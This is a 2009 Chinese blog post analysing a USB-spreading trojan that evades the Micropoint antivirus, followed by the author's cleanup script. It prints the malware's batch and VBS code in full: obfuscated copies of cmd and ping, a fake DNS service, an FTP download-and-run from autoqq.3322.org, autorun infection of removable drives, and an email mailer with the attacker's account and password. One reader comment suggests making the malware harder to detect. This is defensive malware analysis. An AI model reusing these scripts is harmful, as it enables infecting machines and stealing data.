百度空间 | 百度首页 
 
查看文章
  
【ChiChou517826104】过微点木马样本Trojan.Win32.IAgent分析
2009-05-03 22:12

2009年05月03日 星期日 18:26
过微点样本down.exe的分析。

帮同学修复U盘的时候拿到的。
一个猥琐的木马,使用了大量的脚本、批处理、计划任务等手段,终于逃过了Micropoint的监控……
非常猥琐~

下面是分析~

Trojan/Win32.IAgent

病毒使用vb6编写~ ASPack加壳。

原始工程名~
D盘感染(2.22确定).vbp

源码应该放在作者电脑的E盘~~~哈哈~



作者的VB安装目录
X:\Program Files\Microsoft Visual Studio\VB98

作者Q号~~ (sunhopp@tom.com)


使用at命令创建大量计划任务,命令行为
cmd /c cmd<C:\windows\system32\attusb.dll



在system32目录下创建

%systsmroot%\system32\attusb.dll ;一个辅助感染的批处理
%systsmroot%\system32\down.exe ;木马的副本



attusb.dll内容是一个批处理文件。代码如下:

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^X^E /y
Systen /c %SystemRoot%\system32\autousb.bat

在计划任务里面使用 cmd /c<C:\windows\system32\attusb.dll 命令行来运行这个批处理。
使用“^“逃避路径检测。cmd执行的是这样的代码

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
;查找 systen.exe 进程(cmd的副本)。同时关闭cmd.exe
copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\Systen.exe /y
;复制 cmd.exe,改名为 systen.exe
copy C:\WINDOWS\system32\ping.exe C:\WINDOWS\system32\EXPL0RER.EXE /y
;复制 ping.exe,改名为 explorer.exe
Systen /c %SystemRoot%\system32\autousb.bat
;使用systen.exe(实际为cmd.exe的副本)执行 %SystemRoot%\system32\autousb.bat

遍历D盘根目录下的所有文件夹,保存列表到
%SystemRoot%\system32\ok.txt



同时隐藏D盘所有文件夹,并建立同名的.exe副本诱惑用户点击



如果插入了U盘,将做同样的感染。

创建win.bat,内容如下。
功能是用来创建自启动项(不过我没有看到生成了什么文件)

@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
:ok
@ net stop sharedaccess
sc stop sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
@ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S                                                                                /c start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用,任何依赖它的服务将无法启动。"
@ sc start DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
ftp -s:1.RMVB
del 1.RMVB
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
echo o autoqq.3322.org > 2.RMVB&echo 4567 >> 2.RMVB&echo 4567 >> 2.RMVB&echo get boot.exe boot.exe >> 2.RMVB&echo del down.exe >> 2.RMVB&echo bye >> 2.RMVB
ftp -s:2.RMVB
del 2.RMVB
exit

创建autousb.bat,用来写入autorun

setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
:3
EXPL0RER /n 10 127.0.1 &goto 1
;其实是调用ping延时 + 死循环

创建mail3.vbs,用来发送邮件(什么年代了。。。)
哈哈,这位大牛的Q号也在哈~

On Error Resume Next
mailto="294503954@qq.com" '路过~~~
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
mailbody=f.ReadAll
f.Close
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
set Email = CreateObject("CDO.Message")
Email.From = "sunhopp@tom.com"
Email.To = mailto
Email.Subject = mailbody
Email.Textbody = mailbody
with Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.tom.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "sunhopp"'这位同学的邮箱账户~~~
.Item(NameSpace&"sendpassword") = "autocad" '这位同学的邮箱密码~~~
.Update
end With
Email.Send
Wscript.quit

创建mailbody.txt。我只在里面看到了本机的IP。估计还有其他记录功能。

略过更多废话。

似乎样本在卡饭病毒区也有。看来这个东东已经存活很久了……



后续~

既然这位同学这么喜欢批处理,那我也整一个吧……

@echo off
del /f %systemroot%\Tasks\At*.job
del /f %systemroot%\system32\ok.txt
del /f %systemroot%\system32\down.exe
del /f %systemroot%\system32\attusb.dll,%systemroot%\system32\mail3.vbe
del /f %systemroot%\system32\autousb.bat,%systemroot%\system32\win.bat,%systemroot%\system32\dd.bat
taskkill /f /im explroer.exe
taskkill /f /im systen.exe
taskkill /f /im systen32.exe
del /f %systemroot%\system32\explroer.exe
del /f %systemroot%\system32\systen32.exe
del /f %systemroot%\system32\systen.exe
echo OK.
pause

类别:了解,探讨主动防御技术proactive defense | 添加到搜藏 | 浏览() | 评论 (3)
 
最近读者:
 
网友评论:
1
2009-05-04 01:42 | 回复
 
2
2009-05-04 22:45 | 回复
还应该ren *******\systen.exe *******\cmd.exe >nul 2>nul ren *******\explorer.exe *******\ping.exe >nul 2>nul
或者直接删除 del /f /s /q /a *******\systen.exe &
*******\explorer.exe
 
3
2009-05-04 22:47 | 回复
或许它应该把bat编译成exe好一点 bat太容易看懂了 再加老王的壳
那就更好,不过ms这人确实有点菜
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu